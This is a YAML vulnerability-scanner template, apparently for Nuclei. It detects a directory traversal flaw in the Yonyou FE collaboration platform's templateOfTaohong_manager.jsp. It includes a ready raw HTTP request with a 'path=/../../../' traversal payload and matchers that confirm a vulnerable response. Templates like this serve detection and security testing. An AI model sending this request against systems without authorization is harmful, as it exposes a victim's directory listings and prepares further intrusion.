34 lines
1.2 KiB
YAML
Executable File
34 lines
1.2 KiB
YAML
Executable File
id: yonyou-fe-directory-traversal
|
||
|
||
info:
|
||
name: yonyou-fe-directory-traversal
|
||
author: SleepingBag945
|
||
severity: medium
|
||
description: 用友 FE协作办公平台 templateOfTaohong_manager.jsp文件存在目录遍历漏洞,通过漏洞攻击者可以获取目录文件等信息,导致进一步攻击
|
||
reference:
|
||
- http://wiki.peiqi.tech/wiki/oa/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20FE%E5%8D%8F%E4%BD%9C%E5%8A%9E%E5%85%AC%E5%B9%B3%E5%8F%B0%20templateOfTaohong_manager.jsp%20%E7%9B%AE%E5%BD%95%E9%81%8D%E5%8E%86%E6%BC%8F%E6%B4%9E.html
|
||
tags: yonyou
|
||
|
||
http:
|
||
- raw:
|
||
- |
|
||
GET /system/mediafile/templateOfTaohong_manager.jsp?path=/../../../ HTTP/1.1
|
||
Host: {{Hostname}}
|
||
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
|
||
Accept: */*
|
||
Cookie: JSESSIONID=31DB4A83640B082DBA62A54ADB04D77C
|
||
Accept-Encoding: gzip
|
||
|
||
|
||
|
||
matchers-condition: and
|
||
matchers:
|
||
- type: word
|
||
words:
|
||
- "window.location=\"templateOfTaohong_manager.jsp?path=\""
|
||
- type: word
|
||
words:
|
||
- "var next=window.confirm(\"确定删除文件吗?\");"
|
||
- type: status
|
||
status:
|
||
- 200 |